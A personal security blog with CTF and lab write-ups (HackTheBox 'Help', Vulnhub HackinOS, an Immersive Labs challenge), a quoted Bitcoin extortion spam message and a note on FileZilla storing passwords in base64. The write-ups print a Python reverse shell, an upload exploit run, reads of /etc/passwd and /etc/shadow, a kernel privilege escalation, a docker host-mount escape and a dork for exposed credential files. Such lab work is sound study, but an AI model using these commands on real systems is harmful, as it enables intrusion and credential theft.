HackTheBox writeup of "Help"

My first writeup for a hackthebox.eu machine, called Help.

$ nmap -Pn --script vuln
Starting Nmap 7.70 ( https://nmap.org ) at 2019-05-11 13:22 CEST
Pre-scan script results:
| broadcast-avahi-dos:
| Discovered hosts:
| After NULL UDP avahi packet DoS (CVE-2011-1002).
|_ Hosts are all up (not vulnerable).
Nmap scan report for
Host is up (0.041s latency).
Not shown: 997 closed ports
22/tcp open ssh
80/tcp open http
| http-cookie-flags:
| /support/:
|_ httponly flag not set
|_http-csrf: Couldn’t find any CSRF vulnerabilities.
|_http-dombased-xss: Couldn’t find any DOM based XSS.
| http-enum:
|_ /support/: Potentially interesting folder
|_http-stored-xss: Couldn’t find any stored XSS vulnerabilities.
3000/tcp open ppp

The interesting part is the file upload (ticket attachments) of the HelpDeskZ installation found under /support/.


/* submit_ticket_controller.php - Line 141 */
$filename = md5($_FILES['attachment']['name'].time()).".".$ext;

Uploaded files get renamed, similar to HackinOS (Vulnhub): the stored name is the md5 of the original filename concatenated with the current Unix time, so it is predictable for anyone who knows roughly when the upload happened.
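As an added example, not the writeup's exploit script and not HelpDeskZ's own code: the obfuscation is only as strong as the attacker's ignorance of time(), so the stored name can be recomputed for every second in a small window around the upload and probed. The upload directory path, the exists() callback and the timestamps in the demo are assumptions made for this example.

```python
import hashlib

# Added example (not from the writeup or from HelpDeskZ): predict the
# obfuscated attachment name that HelpDeskZ 1.0.2 assigns in
# submit_ticket_controller.php, line 141:
#     $filename = md5($_FILES['attachment']['name'].time()).".".$ext;
# PHP's time() is an integer number of seconds, so the hashed string is the
# original filename followed by the decimal timestamp, e.g. "shell.php1557580000".
# $ext is assumed here to be the extension the attacker chose (assumption).

UPLOAD_DIR = "/support/uploads/tickets/"  # assumed path for the demo


def helpdeskz_upload_name(original_name: str, unix_time: int, ext: str) -> str:
    """Name the server stores the attachment under for a given upload second."""
    digest = hashlib.md5(f"{original_name}{unix_time}".encode()).hexdigest()
    return f"{digest}.{ext}"


def predict_upload_names(original_name: str, ext: str, t_upload: int, window: int = 10) -> list:
    """All candidate names for t_upload +/- window seconds.

    The window absorbs clock skew between attacker and server and the delay
    between sending the request and the server calling time()."""
    return [
        helpdeskz_upload_name(original_name, t, ext)
        for t in range(t_upload - window, t_upload + window + 1)
    ]


def locate_upload(exists, original_name: str, ext: str, t_upload: int, window: int = 10):
    """Probe each candidate with exists(path) -> bool and return the first hit.

    In a real run exists() would issue an HTTP GET/HEAD for UPLOAD_DIR + name;
    a 200 means the shell is there. Returns None if nothing in the window is
    found, i.e. the window was too small or the upload was rejected."""
    for name in predict_upload_names(original_name, ext, t_upload, window):
        if exists(UPLOAD_DIR + name):
            return name
    return None


def demo():
    """Constructed scenario: our clock said 1557580000 when we uploaded, the
    server's time() returned 1557580003 (3 s skew). The fake server below
    only 'has' the file under the name computed with the server's timestamp."""
    server_ts = 1557580003
    stored = UPLOAD_DIR + helpdeskz_upload_name("shell.php", server_ts, "php")
    return locate_upload(lambda path: path == stored, "shell.php", "php", 1557580000)


if __name__ == "__main__":
    print(demo())
```

Against a real target, exists() becomes an HTTP request per candidate; 21 requests for a 10 second window is cheap, which is why the time-based name adds no real protection.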

Unfortunately .php files aren't allowed on the machine. Too bad. Tried null-byte filenames like cmd.gif^@.php etc., no luck. Ah ok, it seems gifs are not allowed either.

At least https://packetstormsecurity.com/files/138548/helpdeskz-shell.txt taught me how I could have improved my script for HackinOS.

https://vulners.com/zdt/1337DAY-ID-26838 (file download) looks promising.

Ok, as my colleagues from Link Protect suggested, I tried again to upload a PHP file and not get confused by error messages. I tried, still no luck, but then I played around with the exploit script and looked at the original HelpDeskZ and realized that the exploit didn't add the proper upload directory and I had to point it there myself... doh. It instantly worked:

$ python hackthebox/help_expl.py ja.gif0x00.php
Helpdeskz v1.0.2 – Unauthenticated shell upload exploit


GIF89a;
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false
systemd-network:x:101:103:systemd Network Management,,,:/run/systemd/netif:/bin/false
systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false
systemd-bus-proxy:x:103:105:systemd Bus Proxy,,,:/run/systemd:/bin/false
syslog:x:104:108::/home/syslog:/bin/false
_apt:x:105:65534::/nonexistent:/bin/false
messagebus:x:106:110::/var/run/dbus:/bin/false
uuidd:x:107:111::/run/uuidd:/bin/false
help:x:1000:1000:help,,,:/home/help:/bin/bash
sshd:x:108:65534::/var/run/sshd:/usr/sbin/nologin
mysql:x:109:117:MySQL Server,,,:/nonexistent:/bin/false
Debian-exim:x:110:118::/var/spool/exim4:/bin/false

I've got RCE 🙂

I tried a few reverse shells, a Python one:

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("",2323));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

Got a shell 🙂

TTY upgrade:
python -c 'import pty; pty.spawn("/bin/bash")'
python -c 'import pty; pty.spawn("/bin/dash")'

Also:
help@help:/home/help$ whoami

user 🙂

Enumerating, I found:
$ cat /var/www/html/support/includes/config.php

mysql> show databases;
+--------------------+
| Database           |
+--------------------+
| information_schema |
| mysql              |
| performance_schema |
| support            |
| sys                |
+--------------------+
5 rows in set (0.00 sec)

mysql> use support;

mysql> SELECT * FROM users;
+----+------------+----------+-------------------+------------------------------------------+------------------+--------+
| id | salutation | fullname | email             | password                                 | timezone         | status |
+----+------------+----------+-------------------+------------------------------------------+------------------+--------+
|  1 | 0          | helpme   | helpme@helpme.com | c3b3bd1eb5142e29adb0044b16ee4d402d06f9ca | Indian/Christmas | 1      |
| ...                                                                                                                     |
| 53 | 0          | Foo Bar  | foo@bar.nul       | 439d32d3c8e4170db7c2bd3dce1ba29c0cec11b4 | NULL             | 1      |
+----+------------+----------+-------------------+------------------------------------------+------------------+--------+
53 rows in set (0.00 sec)

| 1 | 0 | helpme | helpme@helpme.com | c3b3bd1eb5142e29adb0044b16ee4d402d06f9ca | Indian/Christmas | 1 |

c3b3bd1eb5142e29adb0044b16ee4d402d06f9ca is the SHA1 of godhelpmeplz
5d3c93182bb20f07b994a7f617e99cff is the MD5 of godhelpmeplz

We've got a password for the HelpDeskZ user.

With a heredoc:

cat <<'EOF' > enum.sh
script here
EOF

I managed to get my enumeration script onto the box without having a real TTY. To remember! After enumeration I started looking for privesc exploits for the configuration and found some exploits for the kernel version.

Linux version 4.4.0-116-generic (buildd@lgw01-amd64-021) (gcc version 5.4.0 20160609 (Ubuntu 5.4.0-6ubuntu1~16.04.9) ) #140-Ubuntu SMP Mon Feb 12 21:23:04 UTC 2018

After trying a few, I found this one working: https://www.exploit-db.com/exploits/45010

$ gcc bx.c -o bx

[.] t(-_-t) exploit for counterfeit grsec kernels such as KSPP and linux-hardened t(-_-t)
[.] ** This vulnerability cannot be exploited at all on authentic grsecurity kernel **
[*] creating bpf map
[*] sneaking evil bpf past the verifier
[*] creating socketpair()
[*] attaching bpf backdoor to socket
[*] skbuff => ffff8800369add00
[*] Leaking sock struct from ffff88000622a400
[*] Sock->sk_rcvtimeo at offset 472
[*] Cred structure at ffff88003aa15680
[*] UID from cred structure: 1000, matches the current: 1000
[*] hammering cred structure at ffff88003aa15680
[*] credentials patched, launching shell…

# cat /root/root.txt
cat /root/root.txt

# whoami


Spam wave threatening Website Owners

It seems there is a massive spam campaign going on, originating from this IP: https://www.shodan.io/host/ and regarding this guy also and

Spam comments get placed on WordPress websites, featuring a pretty threatening text, at least for people who have a monetary interest in their websites.

Hey. Soon your hosting account and your domain unordnung.net will be blocked forever, and you will receive tens of thousands of negative feedback from angry people.

Pay me 0.5 BTC until June 1, 2019.
Otherwise, you will get the reputation of a malicious spammer, your site unordnung.net will be blocked for life and you will be sued for insulting believers. I guarantee this to you.

My bitcoin wallet:19ckouUP2E22aJR5BPFdf7jP2oNXR3bezL

Here is a list of what you get if you don’t follow my requirements:
+ abuse spamhouse for aggressive web spam
+ tens of thousands of negative reviews about you and your website from angry people for aggressive web and email spam
+ lifetime blocking of your hosting account for aggressive web and email spam
+ lifetime blocking of your domain for aggressive web and email spam
+ Thousands of angry complaints from angry people will come to your mail and messengers for sending you a lot of spam
+ complete destruction of your reputation and loss of clients forever
+ for a full recovery from the damage you need tens of thousands of dollars

All of the above will result in blocking your domain and hosting account for life. The price of your peace of mind is 0.5 BTC.

Do you want this?

If you do not want the above problems, then before June 1, 2019, you need to send me 0.5 BTC to my Bitcoin wallet: 19ckouUP2E22aJR5BPFdf7jP2oNXR3bezL

How do I do all this to get this result:
1. I will send messages to 33 000 000 sites with contact forms with offensive messages with the address of your site, that is, in this situation, you and the spammer and insult people.
And everyone will not care that it is not you.
2. I’ll send messages to 19,000,000 email addresses and very intrusive advertisements for making money and offer a free iPhone with your website address unordnung.net and your contact details.
And then send out abusive messages with the address of your site.
3. I will do aggressive spam on blogs, forums and other sites (in my database there are 35 978 370 sites and 315 900 sites from which you will definitely get a huge amount of abuse) of your site unordnung.net.
After such spam, the spamhouse will turn its attention on you and after several abuses your host will be forced to block your account for life.
Your domain registrar will also block your domain permanently.

All of the above will result in blocking your domain and hosting account for life.
If you do not want to receive thousands of complaints from users and your hosting provider, then pay before June 1, 2019.
The price of your peace of mind is 0.5 BTC.
Otherwise, I will send your site through tens of millions of sites that will lead to the blocking of your site for life and you will lose everything and your reputation as well.
But get a reputation as a malicious spammer.

My bitcoin wallet:19ckouUP2E22aJR5BPFdf7jP2oNXR3bezL

A quick search shows that a lot of websites got those comments.

Seehofer -.-

Attack on WhatsApp & Co.: Seehofer wants to force messengers to decrypt

heise online – https://heise.de/-4431634

Everyone, please vote the CSU out, urgently.

But that's nothing new; since 2001 human rights have been on the decline. When do we finally get a social scoring system like in China? Do the dystopias have to materialize at such a rapid pace?

On Sunday, please vote for love and freedom <3

FileZilla stores passwords in (almost) plain text

When importing my sitemanager.xml from my Windows FileZilla to my Linux box I discovered that the passwords in it are stored base64-encoded, completely unencrypted. This sucks, because I use a master password to, as I thought, encrypt my passwords with.

        <Pass encoding="base64">base64 encoded password</Pass>

So what is the master password for? Establishing a false sense of security? Doh. https://stackoverflow.com/questions/29790136/filezilla-plain-text-password shows us that FileZilla has been doing it that way for years already.
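As an added example (not from the post and not FileZilla's code), here is what anyone who gets hold of a sitemanager.xml, via a stolen profile or the Google dork below, gets out of it: parse the file, base64-decode every <Pass encoding="base64"> element and list host, user and password. The XML is a constructed sample; entries whose Pass element carries any other encoding attribute are reported as not recovered rather than guessed at.

```python
import base64
import binascii
import xml.etree.ElementTree as ET

# Constructed sample, not a real sitemanager.xml: one entry in FileZilla's
# plain base64 form, one whose password uses some other encoding attribute.
SAMPLE_SITEMANAGER = """<?xml version="1.0" encoding="UTF-8"?>
<FileZilla3 version="3.41.2" platform="windows">
  <Servers>
    <Server>
      <Host>ftp.example.test</Host>
      <Port>21</Port>
      <Protocol>0</Protocol>
      <User>alice</User>
      <Pass encoding="base64">aHVudGVyMg==</Pass>
      <Name>example ftp</Name>
    </Server>
    <Server>
      <Host>sftp.example.test</Host>
      <Port>22</Port>
      <Protocol>1</Protocol>
      <User>bob</User>
      <Pass encoding="other">not-base64-here</Pass>
      <Name>example sftp</Name>
    </Server>
  </Servers>
</FileZilla3>
"""


def extract_credentials(xml_text: str) -> list:
    """Return one dict per <Server>: host, port, user, encoding, password.

    password is the decoded string for encoding="base64" (what the post
    found) and None for anything else, so the caller can tell stored
    plaintext apart from entries that could not be recovered."""
    root = ET.fromstring(xml_text)
    found = []
    for server in root.iter("Server"):
        pass_el = server.find("Pass")
        encoding = pass_el.get("encoding") if pass_el is not None else None
        password = None
        if pass_el is not None and encoding == "base64":
            try:
                raw = base64.b64decode(pass_el.text or "", validate=True)
                password = raw.decode("utf-8", "replace")
            except (binascii.Error, ValueError):
                password = None  # malformed base64: report as not recovered
        found.append({
            "host": server.findtext("Host"),
            "port": server.findtext("Port"),
            "user": server.findtext("User"),
            "encoding": encoding,
            "password": password,
        })
    return found


if __name__ == "__main__":
    for entry in extract_credentials(SAMPLE_SITEMANAGER):
        print(entry)
```

Run against a real file with open("sitemanager.xml").read(); every entry that comes back with a non-None password is a credential that was never protected by anything but base64.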


inurl:"sitemanager.xml" ext:xml -git

DON'T store your passwords in FileZilla.

Vulnhub HackinOS writeup


Running Sparta gave me ports 22 and 8000. On 8000 I found a defunct WordPress which pointed to localhost; that could be fixed by locally assigning localhost to the VM's network IP.

I also found that Handsome_Container was a valid WordPress username. I started bruteforcing it with Burp Suite.

Nikto revealed some interesting infos:

– Nikto v2.1.6
+ Target IP:
+ Target Hostname:
+ Target Port: 8000
+ Start Time: 2019-05-01 14:55:20 (GMT2)
+ Server: Apache/2.4.25 (Debian)
+ Retrieved x-powered-by header: PHP/7.2.15
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ Root page / redirects to:
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Entry ‚/upload.php‘ in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ "robots.txt" contains 2 entries which should be manually viewed.
+ Apache/2.4.25 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.
+ Uncommon header 'link' found, with contents: ; rel="https://api.w.org/"
+ Web Server returns a valid response with junk HTTP methods, this may cause false positives.
+ OSVDB-3233: /icons/README: Apache default file found.
+ /wp-content/plugins/hello.php: PHP error reveals file system path.
+ OSVDB-62684: /wp-content/plugins/hello.php: The WordPress hello.php plugin reveals a file system path
+ /wp-links-opml.php: This WordPress script reveals the installed version.
+ OSVDB-3092: /license.txt: License file found may identify site software.
+ Cookie wordpress_test_cookie created without the httponly flag
+ /wp-login.php: WordPress login found
+ 7919 requests: 0 error(s) and 16 item(s) reported on remote host
+ End Time: 2019-05-01 14:56:56 (GMT2) (96 seconds)
+ 1 host(s) tested

The /upload.php is interesting, it's an image upload function. I started uploading PNG images infected with PHP reverse shells. That didn't work out.

Warning: getimagesize(): PNG file corrupted by ASCII conversion in /var/www/html/upload.php on line 25

At some point I found the hint hidden in the HTML code: <!-- https://github.com/fatihhcelik/Vulnerable-Machine—Hint -->
That revealed the upload.php’s code:

That makes it a lot easier. We can see that the file is renamed to the md5 of the filename plus a random number from 1 to 100.
The script checks the MIME type of the uploaded file but not the extension; allowed are the gif and png MIME types.

So I created a random PNG image with GIMP, opened it with a hex editor and put a PHP reverse shell in it. Upload won't work -.- After learning and experimenting I found a gif working like that:

cat cmd.php

Now we get to launch the shell, and for that we need to find the uploaded file, so I wrote a script to create the 100 possible hashes of cmd.phpXXX:


import hashlib

# upload.php stores the file as md5(filename + N) with N a random number
# from 1 to 100, so print all 100 candidate names, one per line.
textToEncode = input()
bisHundert = 1

while bisHundert <= 100:
    toEncode = textToEncode + str(bisHundert)
    print(hashlib.md5(toEncode.encode()).hexdigest())
    bisHundert += 1

$ python3 md5hackinOS_ctf.py > cmdphphashes.txt
thomsane@anansi:~/python$ cat cmdphphashes.txt

now we can supply wfuzz with the payloads stored in the textfile.

$ sudo wfuzz -w python/cmdphphashes.txt --hc 404

Warning: Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz’s documentation for more information.

* Wfuzz 2.3.4 – The Web Fuzzer *

Total requests: 100

ID Response Lines Word Chars Payload

000024: C=200 3 L 16 W 165 Ch „39b07a3be178f1249b64f60105360c4b“

Total time: 0.245449
Processed Requests: 100
Filtered Requests: 99
Requests/sec.: 407.4165

and it found our "picture" at

and my listener received the shell 🙂 which I upgraded to a real TTY with python -c 'import pty; pty.spawn("/bin/bash")' and started looking for privesc possibilities.

I found /usr/bin/tail to have the SUID bit set and tried:
$ tail -n 100 /root/flag
Life consists of details..

Well, that's not a flag, right? But no permission error either, while cat gives: cat: /root/flag: Permission denied

$ tail -c1G /etc/shadow

Enumerating further, I found /etc/init.d/delete.sh:

$ cat /etc/init.d/delete.sh
while [ 1 ]
do
    rm -rf /var/www/html/uploads/*.php
    sleep 300
done

Okay... that was what kept Burp Suite Intruder from finding the file, because of the speed throttling in the free edition. -.-

cat wp-config.php

LOCK TABLES `host_ssh_cred` WRITE;
/*!40000 ALTER TABLE `host_ssh_cred` DISABLE KEYS */;
INSERT INTO `host_ssh_cred` VALUES ('hummingbirdscyber','e10adc3949ba59abbe56e057f20f883e');
/*!40000 ALTER TABLE `host_ssh_cred` ENABLE KEYS */;

INSERT INTO `wp_users` VALUES (1,'Handsome_Container','$P$BXJ8ZmtYd5lHZOLPgTccLUhaQLxm0L0','handsome_container','pupetofosu@ask-mail.com','','2019-02-23 15:49:54','',0,'Handsome_Container');

e10adc3949ba59abbe56e057f20f883e is the MD5 of 123456

Well, well, well... I was on a container before! I noticed when I looked in /var/www/html and only found an index.html. I was already thinking so when I was looking at the mounts on the container...

[+] Current User

[+] Current User ID
uid=1000(hummingbirdscyber) gid=1000(hummingbirdscyber) groups=1000(hummingbirdscyber),4(adm),24(cdrom),30(dip),46(plugdev),113(lpadmin),128(sambashare),129(docker)

ok, we are in the docker group…so basically root already.

Let's look at which containers run:

hummingbirdscyber@vulnvm:~$ docker ps
252fa8cb1646 ubuntu "/bin/bash" 2 months ago Up 2 days brave_edison
1afdd1f6b82c wordpress:latest "docker-entrypoint.s…" 2 months ago Up 2 days>80/tcp experimental_wordpress_1
81a93420fd22 mysql:5.7 "docker-entrypoint.s…" 2 months ago Up 2 days 3306/tcp, 33060/tcp experimental_db_1

Since I run the vulnerable VM without internet access for security reasons, I used the ubuntu image that already exists to elevate my privileges:

hummingbirdscyber@vulnvm:~$ docker run -v /:/hostOS -i -t ubuntu

Now we are running a new container, and the / filesystem of the host is mounted at /hostOS, so as root inside the container we can read and write anything on the host.

root@c50ed36b8d25:/hostOS/root# cat flag


                                 `+mMMMMMMd/           ./oso/-                           
                                  `/yNMMMMMMMMNo`   .`   +-                   
                                  .oyhMMMMMMMMMMN/.     o.                  
                                    `:+osysyhddhs`    `o`                  
                                     .:oyyhshMMMh.   .:                      
                                  `-//:. `:sshdh: `                         
                                      /+. .d`                           
                                    -/`  `y`                                  
                                  `:`   `/                                    
                                 `.     `

that was fun 🙂 <3


Browsing Reddit I stumbled upon an article about Kevin Mitnick and what he’s doing nowadays. Since I’m still remembering the websites wearing orange free Kevin banners back in the days, I was pretty curious.

It's awesome to see that he runs a very successful cybersec company.

"Mitnick said he initially became a computer hacker because he loved magic."

I love this anecdote. That's pretty much the reason I'm interested in netsec as well, more because of fantasy-novel magery and Ultima Online than Houdini and the like.

I should have started getting into netsec earlier; it's still awesome fun, but it's not as mystified as before I got myself digging deeper into IT security.

I played in UTCTF

239 of 581 ^^

It was quite fun and my first CTF event. I had much RL stuff going on during the 2 days; it might have been better if I had had more time. I'm looking forward to seeing some writeups for the ones I tried and didn't solve.


Immune Hacking Group writeup

This is a quick writeup of the challenge https://immersivelabs.online/labs/cyber-warrior-immune-hacking-group which was funny 🙂

In this warrior challenge you’ll need to follow the breadcrumbs to infiltrate an underground hacking community. You can find the community at their website, immunehackinggroup.tk – from here its all on you. 

I found the first flag in the source code of their web page:

<!--Tm90ZSB0byBhZG1pbnM6IHVzZSB0aGUgdXN1YWwgcm90YXRpb24gY2lwaGVyIHRvIGFjY2VzcyBvdXIgZGFyayBuZXQgc2l0ZTogYm5uajovLzdjcjR0cGdobXdxNmcybXguaWhjaWgv RkxBRzogMWI1MDRkMzMyOGUxNmZkZjI4MWQxZmI5NTE2ZGQ5MGI=--><br/> <!--FLAG: f447b20a7fcbf53a5d5be013ea0b15af--></p>

I decoded the base64-encoded text, getting:

Note to admins: use the usual rotation cipher to access our dark net site: bnnj://7cr4tpghmwxxxxxxxxx
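Both steps together, as an added example that is not part of the original writeup: pull the base64 out of the HTML comments, then brute-force the rotation using the URL scheme as known plaintext (http:// is four letters plus punctuation, which pins the shift down). The sample note and the example.onion address are constructed; they are not the challenge's real darknet address.

```python
import base64
import re
import string

# Constructed stand-in for the group's page: the note is base64 inside an
# HTML comment and the link in it is letter-rotated (digits untouched).
# "example.onion" is made up, not the challenge's real address.
SAMPLE_NOTE = ("Note to admins: use the usual rotation cipher to access our "
               "dark net site: bnnj://yrugjfy.ihcih/")
SAMPLE_HTML = ("<p>Welcome</p><!--"
               + base64.b64encode(SAMPLE_NOTE.encode()).decode()
               + "--><!--FLAG: deadbeef-->")

COMMENT_RE = re.compile(r"<!--(.*?)-->", re.S)


def rot(text: str, shift: int) -> str:
    """Shift A-Z/a-z by shift positions; digits and punctuation are kept,
    so a .onion name with digits survives the transformation."""
    out = []
    for ch in text:
        if ch in string.ascii_lowercase:
            out.append(string.ascii_lowercase[(ord(ch) - 97 + shift) % 26])
        elif ch in string.ascii_uppercase:
            out.append(string.ascii_uppercase[(ord(ch) - 65 + shift) % 26])
        else:
            out.append(ch)
    return "".join(out)


def decode_base64_comments(html: str) -> list:
    """Base64-decode every HTML comment that decodes cleanly; skip the rest
    (e.g. the plain "FLAG: ..." comment is not valid base64)."""
    notes = []
    for body in COMMENT_RE.findall(html):
        try:
            notes.append(base64.b64decode(body.strip(), validate=True).decode("utf-8"))
        except (ValueError, UnicodeDecodeError):  # binascii.Error is a ValueError
            continue
    return notes


def crack_rotation(ciphertext: str, known_prefix: str = "http://"):
    """Try all 26 shifts; return (shift, plaintext) for the one whose output
    starts with known_prefix, or None if no shift fits."""
    for shift in range(26):
        candidate = rot(ciphertext, shift)
        if candidate.startswith(known_prefix):
            return shift, candidate
    return None


def recover_onion_url(html: str):
    """Full chain: find the base64 note, pull the rotated link, crack it."""
    for note in decode_base64_comments(html):
        match = re.search(r"(\S+://\S+)", note)
        if match:
            cracked = crack_rotation(match.group(1))
            if cracked:
                return cracked
    return None


if __name__ == "__main__":
    print(recover_onion_url(SAMPLE_HTML))
```

Using the scheme as a crib avoids eyeballing 25 candidates on a site like dcode.fr, and the same crack_rotation() works for any rotated link as long as you know what it must start with.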

With the help of https://www.dcode.fr/rot-cipher I decoded the rotation cipher, getting:


On their darknet page I found another flag and an SSH key:

FAO Admins: We’ve not included the servername required for the full connection.

<secret>.immunehackinggroup.tkxx password

 FLAG: 827ccb0eea8a706c4c34a16891f84e7b


They sent me a lion, but he was too FIERCE. So they send me a TXT record, it was perfect!  

So I looked at the DNS entries of their domain and found a flag:

dnsrecon -d immunehackinggroup.tk

[*] A immunehackinggroup.tk
[*] A immunehackinggroup.tk
[*] TXT immunehackinggroup.tk FLAG:25d55ad283aa400af464c76d713c07ad
[*] Enumerating SRV Records
[-] No SRV Records Found for immunehackinggroup.tk
[+] 0 Records Found

With robtex.com I found the FQDN of the SSH server:


FQDN hidden.immunehackinggroup.tk
Host Name hidden
Domain Name immunehackinggroup.tk
Registry tk
TLD tk
IP numbers

With the SSH key and credentials found on the onion site I logged in via SSH and found a flag:
ubuntu@ip-172-31-45-227:~$ cat /home/ubuntu/flag.txt

which was the final flag for the objective. But I decided to go further and enumerate the system. There is a lot of evidence that other people tried to elevate privileges with exploits. Luckily I was able to wget LinEnum.sh and found a lot, so I didn't need to use exploits at all.

ubuntu@ip-172-31-45-227:~$ sudo cat /root/flag.txt

sudo was enabled for user ubuntu w/o password ^^ enum is the key 😛 So I found another flag in /root and another in /root/contacts/membership.

ubuntu@ip-172-31-45-227:~$ sudo cat /root/contacts/membership

NOW it gets funny:

ubuntu@ip-172-31-45-227:~$ sudo cat /home/ubuntu/README
We recently had some issues with accounts, and we had to reset the root password of Your account to a randomly generated one It's recommended to change the password for security reasons Current root password: xxxxx Sorry for the inconvenience, the Amazon Team

root@ip-172-31-45-227:/home/ubuntu# whoami


root@ip-172-31-45-227:/home/ubuntu# echo "hi, send me some extra points i got way more flags 🙂 btw i love your virtual labs, but i dunno if i meant to get root on this machine, for security reasons i change the root passwd 😉 contact me at xxx@unordnung.net if thats not part of the challenge immunehackinggroup." | mail -s "hi. might be an incident" enquiries@immersivelabs.com
root@ip-172-31-45-227:/home/ubuntu# passwd
Enter new UNIX password:
Retype new UNIX password:
passwd: password updated successfully


you got mail immersivelabs, thx for the fun 🙂
root@ip-172-31-45-227:/home/ubuntu# exit

So... what now? Breaking out of KVM? (Is that still the CTF, or am I hacking AWS then? 🙂) Installing miners?

I'm a newbie, as you might've already guessed.